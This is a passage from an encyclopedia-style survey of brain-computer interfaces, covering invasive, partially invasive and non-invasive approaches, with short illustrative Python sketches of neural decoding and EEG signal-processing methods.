Dobelle's first prototype was implanted into "Jerry", a man blinded in adulthood, in 1978. A single-array BCI containing 68 electrodes was implanted onto Jerry's visual cortex and succeeded in producing phosphenes, the sensation of seeing light. The system included cameras mounted on glasses to send signals to the implant. Initially, the implant allowed Jerry to see shades of grey in a limited field of vision at a low frame-rate. It also required him to be hooked up to a mainframe computer, but shrinking electronics and faster computers later made his artificial eye more portable and enabled him to perform simple tasks unassisted.
In 2002, Jens Naumann, also blinded in adulthood, became the first in a series of 16 paying patients to receive Dobelle's second generation implant, marking one of the earliest commercial uses of BCIs. The second generation device used a more sophisticated implant enabling better mapping of phosphenes into coherent vision. Phosphenes are spread out across the visual field in what researchers call "the starry-night effect". Immediately after his implant, Jens was able to use his imperfectly restored vision to drive an automobile slowly around the parking area of the research institute. Unfortunately, Dobelle died in 2004 before his processes and developments were documented. Subsequently, when Mr. Naumann and the other patients in the program began having problems with their vision, there was no relief and they eventually lost their "sight" again. Naumann wrote about his experience with Dobelle's work in Search for Paradise: A Patient's Account of the Artificial Vision Experiment and has returned to his farm in Southeast Ontario, Canada, to resume his normal activities.
Movement
BCIs focusing on motor neuroprosthetics aim to either restore movement in individuals with paralysis or provide devices to assist them, such as interfaces with computers or robot arms.
Researchers at Emory University in Atlanta, led by Philip Kennedy and Roy Bakay, were first to install a brain implant in a human that produced signals of high enough quality to simulate movement. Their patient, Johnny Ray (1944–2002), suffered from 'locked-in syndrome' after suffering a brain-stem stroke in 1997. Ray's implant was installed in 1998 and he lived long enough to start working with the implant, eventually learning to control a computer cursor; he died in 2002 of a brain aneurysm.
Tetraplegic Matt Nagle became the first person to control an artificial hand using a BCI in 2005 as part of the first nine-month human trial of Cyberkinetics's BrainGate chip-implant. Implanted in Nagle's right precentral gyrus (area of the motor cortex for arm movement), the 96-electrode BrainGate implant allowed Nagle to control a robotic arm by thinking about moving his hand as well as a computer cursor, lights and TV. One year later, professor Jonathan Wolpaw received the prize of the Altran Foundation for Innovation to develop a Brain Computer Interface with electrodes located on the surface of the skull, instead of directly in the brain.
More recently, research teams led by the BrainGate group at Brown University and a group led by University of Pittsburgh Medical Center, both in collaborations with the United States Department of Veterans Affairs, have demonstrated further success in direct control of robotic prosthetic limbs with many degrees of freedom using direct connections to arrays of neurons in the motor cortex of patients with tetraplegia.
Communication
In May 2021, a Stanford University team reported a successful proof-of-concept test that enabled a quadriplegic participant to input English sentences at about 86 characters per minute and 18 words per minute. The participant imagined moving his hand to write letters, and the system performed handwriting recognition on electrical signals detected in the motor cortex, using hidden Markov models and recurrent neural networks for decoding.
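As a rough sketch of the recurrent-network component of such a decoder, the code below maps a window of binned neural activity to per-time-bin character logits. It is an illustrative example only, not the published Stanford system; the channel count, hidden size, and character set size are hypothetical.

```python
import torch
import torch.nn as nn

# Illustrative RNN decoder mapping binned neural activity to character
# probabilities, in the spirit of the handwriting BCI described above.
# Dimensions, architecture, and training details are assumptions.

class CharDecoder(nn.Module):
    def __init__(self, n_channels=192, hidden=256, n_chars=31):
        super().__init__()
        self.gru = nn.GRU(input_size=n_channels, hidden_size=hidden, batch_first=True)
        self.readout = nn.Linear(hidden, n_chars)   # e.g. 26 letters plus a few symbols

    def forward(self, x):
        # x: (batch, time_bins, channels) of binned firing rates
        out, _ = self.gru(x)
        return self.readout(out)                    # per-bin character logits

if __name__ == "__main__":
    decoder = CharDecoder()
    fake_rates = torch.randn(1, 100, 192)           # 100 time bins, 192 hypothetical channels
    logits = decoder(fake_rates)
    print("logits shape:", tuple(logits.shape))     # (1, 100, 31)
```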
A report published in July 2021 reported a paralyzed patient was able to communicate 15 words per minute using a brain implant that analyzed motor neurons that previously controlled the vocal tract.
In a recent review article, researchers raised an open question of whether human information transfer rates can surpass that of language with BCIs. Given that recent language research has demonstrated that human information transfer rates are relatively constant across many languages, there may exist a limit at the level of information processing in the brain. On the contrary, this "upper limit" of information transfer rate may be intrinsic to language itself, as a modality for information transfer.
Technical challenges
There exist a number of technical challenges to recording brain activity with invasive BCIs. Advances in CMOS technology are pushing and enabling integrated, invasive BCI designs with smaller size, lower power requirements, and higher signal acquisition capabilities. Invasive BCIs involve electrodes that penetrate brain tissue in an attempt to record action potential signals (also known as spikes) from individual, or small groups of, neurons near the electrode. The interface between a recording electrode and the electrolytic solution surrounding neurons has been modelled using the Hodgkin-Huxley model.
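For reference, the Hodgkin-Huxley formalism mentioned above expresses the membrane potential V through a current-balance equation of the standard textbook form:

$$C_m \frac{dV}{dt} = I_{\text{ext}} - \bar{g}_{\text{Na}}\, m^3 h\,(V - E_{\text{Na}}) - \bar{g}_{\text{K}}\, n^4 (V - E_{\text{K}}) - \bar{g}_{\text{L}}\,(V - E_{\text{L}})$$

where $C_m$ is the membrane capacitance, $m$, $h$, and $n$ are voltage-dependent gating variables, and each $\bar{g}$ and $E$ pair gives the maximal conductance and reversal potential of the sodium, potassium, and leak currents.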
Electronic limitations to invasive BCIs have been an active area of research in recent decades. While intracellular recordings of neurons reveal action potential voltages on the scale of hundreds of millivolts, chronic invasive BCIs rely on recording extracellular voltages which typically are three orders of magnitude smaller, existing at hundreds of microvolts. Further adding to the challenge of detecting signals on the scale of microvolts is the fact that the electrode-tissue interface has a high capacitance at small voltages. Due to the nature of these small signals, for BCI systems that incorporate functionality onto an integrated circuit, each electrode requires its own amplifier and ADC, which convert analog extracellular voltages into digital signals. Because a typical neuron action potential lasts for one millisecond, BCIs measuring spikes must have sampling rates ranging from 300 Hz to 5 kHz. Yet another concern is that invasive BCIs must be low-power, so as to dissipate less heat to surrounding tissue; at the most basic level, more power is traditionally needed to optimize signal-to-noise ratio. Optimal battery design is an active area of research in BCIs.

Challenges in the area of materials science are also central to the design of invasive BCIs. Variations in signal quality over time have been commonly observed with implantable microelectrodes. Optimal material and mechanical characteristics for long-term signal stability in invasive BCIs have been an active area of research. It has been proposed that the formation of glial scarring, secondary to damage at the electrode-tissue interface, is likely responsible for electrode failure and reduced recording performance. Research has suggested that blood-brain barrier leakage, either at the time of insertion or over time, may be responsible for the inflammatory and glial reaction to chronic microelectrodes implanted in the brain. As a result, flexible and tissue-like designs have been researched and developed to minimize foreign-body reaction by matching the Young's modulus of the electrode more closely to that of brain tissue.
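To make the microvolt amplitudes and sampling rates discussed in this section concrete, the sketch below applies a common noise-adaptive threshold (a multiple of a median-based noise estimate, a widely used heuristic rather than any particular device's algorithm) to a simulated extracellular trace; all numbers are example values.

```python
import numpy as np

# Illustrative spike detection on a simulated extracellular trace. The -4.5x
# noise threshold is a common heuristic based on a median absolute deviation
# noise estimate, not any specific device's algorithm; all values are examples.

fs = 5_000                                    # sampling rate in Hz (upper end of range above)
rng = np.random.default_rng(1)
trace_uv = rng.normal(0.0, 10.0, size=fs)     # 1 s of ~10 uV RMS background noise

# Inject three crude 1 ms "spikes" of roughly -80 uV peak amplitude.
spike_shape = -80.0 * np.hanning(int(0.001 * fs))
for start in (1_000, 2_500, 4_000):
    trace_uv[start:start + spike_shape.size] += spike_shape

noise_sigma = np.median(np.abs(trace_uv)) / 0.6745    # robust noise estimate
threshold = -4.5 * noise_sigma
crossings = np.flatnonzero((trace_uv[1:] < threshold) & (trace_uv[:-1] >= threshold))
print(f"threshold: {threshold:.1f} uV, detected spikes: {crossings.size}")
```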
Partially invasive BCIs
Partially invasive BCI devices are implanted inside the skull but rest outside the brain rather than within the grey matter. They produce signals with better resolution than non-invasive BCIs, in which the bone tissue of the cranium deflects and deforms signals, and they carry a lower risk of forming scar tissue in the brain than fully invasive BCIs. There has been preclinical demonstration of intracortical BCIs from the stroke perilesional cortex.
Endovascular
A systematic review published in 2020 detailed multiple studies, both clinical and non-clinical, dating back decades investigating the feasibility of endovascular BCIs.
In recent years, the biggest advance in partially invasive BCIs has emerged in the area of interventional neurology. In 2010, researchers affiliated with the University of Melbourne began developing a BCI that could be inserted via the vascular system. The Australian neurologist Thomas Oxley (Mount Sinai Hospital) conceived the idea for this BCI, called the Stentrode, which has received funding from DARPA. Preclinical studies evaluated the technology in sheep.
The Stentrode, a monolithic stent electrode array, is designed to be delivered via an intravenous catheter under image guidance to the superior sagittal sinus, in a region adjacent to the motor cortex. This proximity to the motor cortex underlies the Stentrode's ability to measure neural activity. The procedure is most similar to how venous sinus stents are placed for the treatment of idiopathic intracranial hypertension. The Stentrode communicates neural activity to a battery-less telemetry unit implanted in the chest, which communicates wirelessly with an external telemetry unit capable of power and data transfer. While an endovascular BCI benefits from avoiding craniotomy for insertion, risks such as clotting and venous thrombosis are possible. In preclinical animal studies of the Stentrode, twenty implanted animals showed no evidence of thrombus formation after 190 days, possibly due to endothelial incorporation of the Stentrode into the vessel wall.
First-in-human trials with the Stentrode are underway. In November 2020, two participants with amyotrophic lateral sclerosis were able to wirelessly control an operating system to text, email, shop, and bank using direct thought through the Stentrode brain-computer interface, marking the first time a brain-computer interface was implanted via the patients' blood vessels, eliminating the need for open brain surgery.
ECoG
Electrocorticography (ECoG) measures the electrical activity of the brain taken from beneath the skull in a similar way to non-invasive electroencephalography, but the electrodes are embedded in a thin plastic pad that is placed above the cortex, beneath the dura mater. ECoG technologies were first trialled in humans in 2004 by Eric Leuthardt and Daniel Moran from Washington University in St Louis. In a later trial, the researchers enabled a teenage boy to play Space Invaders using his ECoG implant. This research indicates that control is rapid, requires minimal training, and may be an ideal tradeoff with regards to signal fidelity and level of invasiveness.
Signals can be either subdural or epidural, but are not taken from within the brain parenchyma itself. ECoG had not been studied extensively until recently because of limited access to subjects. Currently, the only way to acquire the signal for study is from patients who require invasive monitoring for localization and resection of an epileptogenic focus.
ECoG is a very promising intermediate BCI modality because it has higher spatial resolution, better signal-to-noise ratio, wider frequency range, and lower training requirements than scalp-recorded EEG, and at the same time has lower technical difficulty, lower clinical risk, and possibly better long-term stability than intracortical single-neuron recording. This feature profile, and recent evidence of the high level of control achievable with minimal training, shows potential for real-world application for people with motor disabilities. Light reactive imaging BCI devices are still in the realm of theory.
Recent work published by Edward Chang and Joseph Makin from UCSF revealed that ECoG signals could be used to decode speech from epilepsy patients implanted with high-density ECoG arrays over the peri-Sylvian cortices. Their study achieved word error rates of 3% (a marked improvement from prior publications) utilizing an encoder-decoder neural network, which translated ECoG data into one of fifty sentences composed of 250 unique words.
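As an illustration of the general encoder-decoder idea, and not the architecture or code used in the UCSF study, the following PyTorch sketch maps a multichannel ECoG recording to a sequence of word indices. The array dimensions, vocabulary size, and training details are assumptions made for the example.

import torch
import torch.nn as nn

# Minimal encoder-decoder sketch: ECoG time series -> sequence of word indices.
# Dimensions and vocabulary are illustrative assumptions.
N_CHANNELS, VOCAB, HIDDEN = 128, 250, 256

class EcogToText(nn.Module):
    def __init__(self):
        super().__init__()
        self.encoder = nn.GRU(N_CHANNELS, HIDDEN, batch_first=True)
        self.embed = nn.Embedding(VOCAB, HIDDEN)
        self.decoder = nn.GRU(HIDDEN, HIDDEN, batch_first=True)
        self.out = nn.Linear(HIDDEN, VOCAB)

    def forward(self, ecog, target_words):
        # ecog: (batch, time, channels); target_words: (batch, words)
        _, state = self.encoder(ecog)           # summarize the neural recording
        emb = self.embed(target_words)          # teacher forcing during training
        dec_out, _ = self.decoder(emb, state)   # decoder conditioned on encoder state
        return self.out(dec_out)                # (batch, words, vocab) logits

model = EcogToText()
ecog = torch.randn(4, 1000, N_CHANNELS)         # 4 sentences of synthetic "ECoG"
words = torch.randint(0, VOCAB, (4, 8))         # their (dummy) word transcriptions
logits = model(ecog, words)
loss = nn.functional.cross_entropy(logits.reshape(-1, VOCAB), words.reshape(-1))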
Non-invasive BCIs
There have also been experiments in humans using non-invasive neuroimaging technologies as interfaces. The substantial majority of published BCI work involves noninvasive EEG-based BCIs. Noninvasive EEG-based technologies and interfaces have been used for a much broader variety of applications. Although EEG-based interfaces are easy to wear and do not require surgery, they have relatively poor spatial resolution and cannot effectively use higher-frequency signals because the skull dampens signals, dispersing and blurring the electromagnetic waves created by the neurons. EEG-based interfaces also require some time and effort prior to each usage session, whereas non-EEG-based ones, as well as invasive ones, require no prior-usage training. Overall, the best BCI for each user depends on numerous factors.
Non-EEG-based human–computer interface
Electrooculography (EOG)
In 1989, a report was given on control of a mobile robot by eye movement using electrooculography (EOG) signals. A mobile robot was driven from a start to a goal point using five EOG commands, interpreted as forward, backward, left, right, and stop. Using the EOG to control external objects had been presented as a challenge by Vidal in his 1973 paper.
Pupil-size oscillation
A 2016 article described an entirely new communication device and non-EEG-based human-computer interface that requires no visual fixation, or ability to move the eyes at all. The interface is based on covert interest: directing one's attention to a chosen letter on a virtual keyboard, without the need to move one's eyes to look directly at the letter. Each letter has its own (background) circle which micro-oscillates in brightness differently from all of the other letters. The letter selection is based on the best fit between unintentional pupil-size oscillation and the background circle's brightness oscillation pattern. Accuracy is additionally improved by the user's mental rehearsing of the words 'bright' and 'dark' in synchrony with the brightness transitions of the letter's circle.
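The selection principle can be sketched as follows in Python/NumPy: each letter's brightness-oscillation pattern is correlated with the measured pupil-size trace, and the best-matching letter is selected. The oscillation frequencies, sampling rate, and simulated pupil signal are hypothetical stand-ins, not parameters from the cited study.

import numpy as np

# Illustrative sketch: choose the letter whose background-brightness
# oscillation best matches the measured pupil-size oscillation.
fs, seconds = 60.0, 10.0                       # assumed sampling rate and trial length
t = np.arange(0, seconds, 1 / fs)
letter_freqs = {"A": 0.8, "B": 1.0, "C": 1.2}  # hypothetical oscillation rates (Hz)
brightness = {k: np.sin(2 * np.pi * f * t) for k, f in letter_freqs.items()}

# Simulated pupil trace: follows letter "B" plus noise (stand-in for real data).
pupil = np.sin(2 * np.pi * letter_freqs["B"] * t) + 0.5 * np.random.randn(t.size)

def normalized_corr(x, y):
    x, y = x - x.mean(), y - y.mean()
    return float(np.dot(x, y) / (np.linalg.norm(x) * np.linalg.norm(y)))

scores = {k: normalized_corr(pupil, b) for k, b in brightness.items()}
selected = max(scores, key=scores.get)         # best fit -> selected letter
print(selected, scores)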
Functional near-infrared spectroscopy
In 2014 and 2017, a BCI using functional near-infrared spectroscopy for "locked-in" patients with amyotrophic lateral sclerosis (ALS) was able to restore some basic ability of the patients to communicate with other people.
Electroencephalography (EEG)-based brain-computer interfaces
After the BCI challenge was stated by Vidal in 1973, the initial reports on the non-invasive approach included control of a cursor in 2D using VEPs (Vidal, 1977), control of a buzzer using the CNV (Bozinovska et al., 1988, 1990), control of a physical object, a robot, using a brain rhythm (alpha) (Bozinovski et al., 1988), and control of text written on a screen using the P300 (Farwell and Donchin, 1988).
In the early days of BCI research, another substantial barrier to using electroencephalography (EEG) as a brain–computer interface was the extensive training required before users could operate the technology. For example, in experiments beginning in the mid-1990s, Niels Birbaumer at the University of Tübingen in Germany trained severely paralysed people to self-regulate the slow cortical potentials in their EEG to such an extent that these signals could be used as a binary signal to control a computer cursor. (Birbaumer had earlier trained epileptics to prevent impending fits by controlling this low-voltage wave.) The experiment saw ten patients trained to move a computer cursor by controlling their brainwaves. The process was slow, requiring more than an hour for patients to write 100 characters with the cursor, while training often took many months. However, the slow cortical potential approach to BCIs has not been used in several years, since other approaches require little or no training, are faster and more accurate, and work for a greater proportion of users.
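A toy sketch of the underlying binary control scheme is shown below: a slowly varying EEG component is compared against a calibration baseline to produce an on/off command. The sampling rate, window lengths, decision polarity, and the crude slow-wave estimate are illustrative simplifications, not the protocol used by Birbaumer's group.

import numpy as np

# Toy sketch of binary control from a self-regulated slow cortical potential.
# All values are illustrative; a real system would band-pass filter below
# ~1 Hz and correct for eye-movement artifacts.
fs = 256                                    # assumed EEG sampling rate (Hz)
eeg = np.random.randn(fs * 4)               # stand-in for 4 s of one EEG channel

# Crude slow-wave estimate: mean over one-second windows.
slow_potential = eeg.reshape(-1, fs).mean(axis=1)   # one value per second

baseline = slow_potential[:2].mean()        # calibration period
# Arbitrary polarity chosen for the example: a negative shift means "select".
command = "select" if slow_potential[-1] < baseline else "rest"
print(command)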
Another research parameter is the type of oscillatory activity that is measured. Gert Pfurtscheller founded the BCI Lab in 1991 and fed his research results on motor imagery into the first online BCI based on oscillatory features and classifiers. Together with Birbaumer and Jonathan Wolpaw of the Wadsworth Center in New York State, he focused on developing technology that would allow users to choose the brain signals they found easiest to operate a BCI, including mu and beta rhythms.
A further parameter is the method of feedback used and this is shown in studies of P300 signals. Patterns of P300 waves are generated involuntarily (stimulus-feedback) when people see something they recognize and may allow BCIs to decode categories of thoughts without training patients first. By contrast, the biofeedback methods described above require learning to control brainwaves so the resulting brain activity can be detected.
In 2005, research was reported on EEG emulation of digital control circuits for BCI, with the example of a CNV flip-flop. In 2009, noninvasive EEG control of a robotic arm using a CNV flip-flop was reported. In 2011, control of two robotic arms solving the Tower of Hanoi task with three disks using a CNV flip-flop was reported. In 2015, EEG emulation of a Schmitt trigger, flip-flop, demultiplexer, and modem was described.
While EEG-based brain-computer interfaces have been pursued extensively by a number of research labs, recent advancements made by Bin He and his team at the University of Minnesota suggest the potential of an EEG-based brain-computer interface to accomplish tasks close to those of invasive brain-computer interfaces. Using advanced functional neuroimaging, including BOLD functional MRI and EEG source imaging, Bin He and co-workers identified the co-variation and co-localization of electrophysiological and hemodynamic signals induced by motor imagination.
Refined by a neuroimaging approach and by a training protocol, Bin He and co-workers demonstrated the ability of a non-invasive EEG based brain-computer interface to control the flight of a virtual helicopter in 3-dimensional space, based upon motor imagination. In June 2013 it was announced that Bin He had developed the technique to enable a remote-control helicopter to be guided through an obstacle course.
In addition to a brain-computer interface based on brain waves, as recorded from scalp EEG electrodes, Bin He and co-workers explored a virtual EEG signal-based brain-computer interface by first solving the EEG inverse problem and then using the resulting virtual EEG for brain-computer interface tasks. Well-controlled studies suggested the merits of such a source-analysis-based brain-computer interface.
A 2014 study found that severely motor-impaired patients could communicate faster and more reliably with non-invasive EEG BCI, than with any muscle-based communication channel.
A 2016 study found that the Emotiv EPOC device may be more suitable for control tasks using the attention/meditation level or eye blinking than the Neurosky MindWave device.
A 2019 study found that the application of evolutionary algorithms could improve EEG mental state classification with a non-invasive Muse device, enabling high quality classification of data acquired by a cheap consumer-grade EEG sensing device.
In a 2021 systematic review of randomized controlled trials using BCI for upper-limb rehabilitation after stroke, EEG-based BCI was found to have significant efficacy in improving upper-limb motor function compared to control therapies. More specifically, BCI studies that utilized band power features, motor imagery, and functional electrical stimulation in their design were found to be more efficacious than alternatives. Another 2021 systematic review focused on robotic-assisted EEG-based BCI for hand rehabilitation after stroke. Improvement in motor assessment scores was observed in three of eleven studies included in the systematic review.
Dry active electrode arrays
In the early 1990s Babak Taheri, at University of California, Davis demonstrated the first single and also multichannel dry active electrode arrays using micro-machining. The single channel dry EEG electrode construction and results were published in 1994. The arrayed electrode was also demonstrated to perform well compared to silver/silver chloride electrodes. The device consisted of four sites of sensors with integrated electronics to reduce noise by impedance matching. The advantages of such electrodes are: (1) no electrolyte used, (2) no skin preparation, (3) significantly reduced sensor size, and (4) compatibility with EEG monitoring systems. The active electrode array is an integrated system made of an array of capacitive sensors with local integrated circuitry housed in a package with batteries to power the circuitry. This level of integration was required to achieve the functional performance obtained by the electrode.
The electrode was tested on an electrical test bench and on human subjects in four modalities of EEG activity, namely: (1) spontaneous EEG, (2) sensory event-related potentials, (3) brain stem potentials, and (4) cognitive event-related potentials. The performance of the dry electrode compared favorably with that of the standard wet electrodes in terms of skin preparation, no gel requirements (dry), and higher signal-to-noise ratio.
In 1999 researchers at Case Western Reserve University, in Cleveland, Ohio, led by Hunter Peckham, used a 64-electrode EEG skullcap to return limited hand movements to quadriplegic Jim Jatich. As Jatich concentrated on simple but opposite concepts like up and down, his beta-rhythm EEG output was analysed using software to identify patterns in the noise. A basic pattern was identified and used to control a switch: above-average activity was set to on, below-average to off. As well as enabling Jatich to control a computer cursor, the signals were also used to drive the nerve controllers embedded in his hands, restoring some movement.
SSVEP mobile EEG BCIs
In 2009, the NCTU Brain-Computer-Interface headband was reported. The researchers who developed this BCI headband also engineered silicon-based microelectromechanical system (MEMS) dry electrodes designed for application to non-hairy sites of the body. These electrodes were secured to the DAQ board in the headband with snap-on electrode holders. The signal processing module measured alpha activity, and the Bluetooth-enabled phone assessed the participants' alertness and capacity for cognitive performance. When the subject became drowsy, the phone sent arousing feedback to the operator to rouse them. This research was supported by the National Science Council, Taiwan, R.O.C., NSC, National Chiao-Tung University, Taiwan's Ministry of Education, and the U.S. Army Research Laboratory.
In 2011, researchers reported a cellular-based BCI capable of taking EEG data and converting it into a command to cause a phone to ring. This research was supported in part by Abraxis Bioscience LLP, the U.S. Army Research Laboratory, and the Army Research Office. The developed technology was a wearable system composed of a four-channel bio-signal acquisition/amplification module, a wireless transmission module, and a Bluetooth-enabled cell phone. The electrodes were placed so that they picked up steady-state visual evoked potentials (SSVEPs). SSVEPs are electrical responses to flickering visual stimuli with repetition rates over 6 Hz that are best found in the parietal and occipital scalp regions over the visual cortex. It was reported that with this BCI setup, all study participants were able to initiate the phone call with minimal practice in natural environments.
The scientists claim that their studies using a single channel fast Fourier transform (FFT) and multiple channel system canonical correlation analysis (CCA) algorithm support the capacity of mobile BCIs. The CCA algorithm has been applied in other experiments investigating BCIs with claimed high performance in accuracy as well as speed. While the cellular based BCI technology was developed to initiate a phone call from SSVEPs, the researchers said that it can be translated for other applications, such as picking up sensorimotor mu/beta rhythms to function as a motor-imagery based BCI.
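The CCA approach to SSVEP detection is a standard technique that can be sketched as follows in Python with scikit-learn; the flicker frequencies, epoch length, channel count, and synthetic data are assumptions for illustration, and this is not the cited groups' actual code. Each EEG epoch is compared against sinusoidal reference signals at every candidate flicker frequency, and the frequency with the highest canonical correlation is taken as the attended stimulus.

import numpy as np
from sklearn.cross_decomposition import CCA

fs, seconds = 250, 4                          # assumed sampling rate and epoch length
t = np.arange(0, seconds, 1 / fs)
stim_freqs = [8.0, 10.0, 12.0, 15.0]          # hypothetical flicker frequencies (Hz)

def references(f):
    # Fundamental and first harmonic, sine and cosine.
    return np.column_stack([np.sin(2 * np.pi * f * t), np.cos(2 * np.pi * f * t),
                            np.sin(4 * np.pi * f * t), np.cos(4 * np.pi * f * t)])

def detect(eeg):                              # eeg: (samples, channels)
    scores = []
    for f in stim_freqs:
        cca = CCA(n_components=1)
        u, v = cca.fit_transform(eeg, references(f))
        scores.append(np.corrcoef(u[:, 0], v[:, 0])[0, 1])
    return stim_freqs[int(np.argmax(scores))], scores

# Synthetic 4-channel epoch dominated by a 12 Hz response.
eeg = 0.5 * np.random.randn(t.size, 4) + np.sin(2 * np.pi * 12.0 * t)[:, None]
print(detect(eeg))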
In 2013, comparative tests were performed on Android cell phone-, tablet-, and computer-based BCIs, analyzing the power spectral density of the resulting EEG SSVEPs. The stated goals of this study, which involved scientists supported in part by the U.S. Army Research Laboratory, were to "increase the practicability, portability, and ubiquity of an SSVEP-based BCI, for daily use". It was reported that the stimulation frequency on all media was accurate, although the cell phone's signal demonstrated some instability. The amplitudes of the SSVEPs for the laptop and tablet were also reported to be larger than those of the cell phone. These two qualitative characterizations were suggested as indicators of the feasibility of using a mobile stimulus BCI.
Limitations
In 2011, researchers stated that continued work should address ease of use, robustness of performance, and reduction of hardware and software costs.
One of the difficulties with EEG readings is the large susceptibility to motion artifacts. In most of the previously described research projects, the participants were asked to sit still, reducing head and eye movements as much as possible, and measurements were taken in a laboratory setting. However, since the emphasized application of these initiatives had been in creating a mobile device for daily use, the technology had to be tested in motion.
In 2013, researchers tested mobile EEG-based BCI technology, measuring SSVEPs from participants as they walked on a treadmill at varying speeds. This research was supported by the Office of Naval Research, Army Research Office, and the U.S. Army Research Laboratory. Stated results were that as speed increased the SSVEP detectability using CCA decreased. As independent component analysis (ICA) had been shown to be efficient in separating EEG signals from noise, the scientists applied ICA to CCA extracted EEG data. They stated that the CCA data with and without ICA processing were similar. Thus, they concluded that CCA independently demonstrated a robustness to motion artifacts that indicates it may be a beneficial algorithm to apply to BCIs used in real world conditions.
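An illustrative version of this ICA-based artifact-removal step is sketched below; selecting the artifact component by its correlation with a motion reference (for example an accelerometer channel) is an assumption made for simplicity and is not necessarily how the cited study chose components.

import numpy as np
from sklearn.decomposition import FastICA

# Decompose multichannel EEG into independent components, drop the component
# most correlated with a motion reference, and reconstruct the cleaned EEG
# before running SSVEP detection. Purely illustrative.
def remove_motion_component(eeg, motion):      # eeg: (samples, channels)
    ica = FastICA(n_components=eeg.shape[1], random_state=0)
    sources = ica.fit_transform(eeg)           # (samples, components)
    corr = [abs(np.corrcoef(sources[:, k], motion)[0, 1])
            for k in range(sources.shape[1])]
    sources[:, int(np.argmax(corr))] = 0.0     # zero out the motion-related source
    return ica.inverse_transform(sources)

eeg = np.random.randn(1000, 8)                 # stand-in EEG
motion = np.random.randn(1000)                 # stand-in accelerometer trace
clean = remove_motion_component(eeg, motion)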
Prosthesis and environment control
Non-invasive BCIs have also been applied to enable brain-control of prosthetic upper and lower extremity devices in people with paralysis. For example, Gert Pfurtscheller of Graz University of Technology and colleagues demonstrated a BCI-controlled functional electrical stimulation system to restore upper extremity movements in a person with tetraplegia due to spinal cord injury. Between 2012 and 2013, researchers at the University of California, Irvine demonstrated for the first time that it is possible to use BCI technology to restore brain-controlled walking after spinal cord injury. In their spinal cord injury research study, a person with paraplegia was able to operate a BCI-robotic gait orthosis to regain basic brain-controlled ambulation.
In 2009 Alex Blainey, an independent researcher based in the UK, successfully used the Emotiv EPOC to control a 5-axis robot arm. He then went on to make several demonstration mind-controlled wheelchairs and home-automation systems that could be operated by people with limited or no motor control, such as those with paraplegia or cerebral palsy.
Research into military use of BCIs funded by DARPA has been ongoing since the 1970s. The current focus of research is user-to-user communication through analysis of neural signals.
DIY and open source BCI
In 2001, The OpenEEG Project was initiated by a group of DIY neuroscientists and engineers. The ModularEEG was the primary device created by the OpenEEG community; it was a 6-channel signal capture board that cost between $200 and $400 to make at home. The OpenEEG Project marked a significant moment in the emergence of DIY brain-computer interfacing.
In 2010, the Frontier Nerds of NYU's ITP program published a thorough tutorial titled How To Hack Toy EEGs. The tutorial, which stirred the minds of many budding DIY BCI enthusiasts, demonstrated how to create a single channel at-home EEG with an Arduino and a Mattel Mindflex at a very reasonable price. This tutorial amplified the DIY BCI movement.
In 2013, OpenBCI emerged from a DARPA solicitation and subsequent Kickstarter campaign. They created a high-quality, open-source 8-channel EEG acquisition board, known as the 32bit Board, that retailed for under $500. Two years later they created the first 3D-printed EEG Headset, known as the Ultracortex, as well as a 4-channel EEG acquisition board, known as the Ganglion Board, that retailed for under $100.
MEG and MRI
Magnetoencephalography (MEG) and functional magnetic resonance imaging (fMRI) have both been used successfully as non-invasive BCIs. In a widely reported experiment, fMRI allowed two users being scanned to play Pong in real-time by altering their haemodynamic response or brain blood flow through biofeedback techniques.
fMRI measurements of haemodynamic responses in real time have also been used to control robot arms with a seven-second delay between thought and movement.
In 2008 research developed in the Advanced Telecommunications Research (ATR) Computational Neuroscience Laboratories in Kyoto, Japan, allowed the scientists to reconstruct images directly from the brain and display them on a computer in black and white at a resolution of 10x10 pixels. The article announcing these achievements was the cover story of the journal Neuron of 10 December 2008.
In 2011 researchers from UC Berkeley published a study reporting second-by-second reconstruction of videos watched by the study's subjects, from fMRI data. This was achieved by creating a statistical model relating visual patterns in videos shown to the subjects, to the brain activity caused by watching the videos. This model was then used to look up the 100 one-second video segments, in a database of 18 million seconds of random YouTube videos, whose visual patterns most closely matched the brain activity recorded when subjects watched a new video. These 100 one-second video extracts were then combined into a mashed-up image that resembled the video being watched.
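The lookup step of this reconstruction can be sketched schematically: predict the brain activity that each database clip would evoke, score every clip by the similarity of its predicted activity to the measured activity, and average the top matches. The code below uses random stand-in data and a plain linear encoding model purely to illustrate the idea; it is not the study's actual model or feature space.

import numpy as np

rng = np.random.default_rng(1)
n_voxels, n_features, n_clips = 500, 64, 10_000

encoding_model = rng.standard_normal((n_features, n_voxels))   # learned from training data in the real study
clip_features = rng.standard_normal((n_clips, n_features))     # visual features of each database clip
predicted_activity = clip_features @ encoding_model            # (n_clips, n_voxels)

# Measured activity for a new one-second segment (here: clip 1234 plus noise).
measured = predicted_activity[1234] + 0.5 * rng.standard_normal(n_voxels)

# Correlate measured activity with every clip's predicted activity.
pm = predicted_activity - predicted_activity.mean(axis=1, keepdims=True)
mm = measured - measured.mean()
scores = (pm @ mm) / (np.linalg.norm(pm, axis=1) * np.linalg.norm(mm))
top100 = np.argsort(scores)[-100:]             # clips to average into the reconstruction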
BCI control strategies in neurogaming
Motor imagery
Motor imagery involves the imagination of the movement of various body parts, resulting in sensorimotor cortex activation, which modulates sensorimotor oscillations in the EEG. This can be detected by the BCI to infer a user's intent. Motor imagery typically requires a number of sessions of training before acceptable control of the BCI is acquired. These training sessions may take a number of hours over several days before users can consistently employ the technique with acceptable levels of precision. Even so, some users never master the control scheme, and the resulting pace of gameplay is very slow. Advanced machine learning methods have recently been developed to compute a subject-specific model for detecting the performance of motor imagery. The top-performing algorithm from BCI Competition IV dataset 2 for motor imagery is the Filter Bank Common Spatial Pattern, developed by Ang et al. of A*STAR, Singapore.
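A simplified version of the Common Spatial Patterns (CSP) computation at the heart of the filter-bank approach is sketched below. This is the generic textbook formulation for one frequency band and two classes, not the competition-winning implementation by Ang et al.

import numpy as np
from scipy.linalg import eigh

# CSP: find spatial filters that maximize variance for one motor-imagery class
# while minimizing it for the other.
def csp_filters(trials_a, trials_b, n_filters=4):
    # trials_*: arrays of shape (n_trials, n_channels, n_samples)
    def mean_cov(trials):
        return np.mean([np.cov(t) for t in trials], axis=0)
    Ca, Cb = mean_cov(trials_a), mean_cov(trials_b)
    # Generalized eigenvalue problem: Ca w = lambda (Ca + Cb) w
    eigvals, eigvecs = eigh(Ca, Ca + Cb)
    order = np.argsort(eigvals)                 # extreme eigenvalues are most discriminative
    picks = np.concatenate([order[:n_filters // 2], order[-n_filters // 2:]])
    return eigvecs[:, picks].T                  # (n_filters, n_channels)

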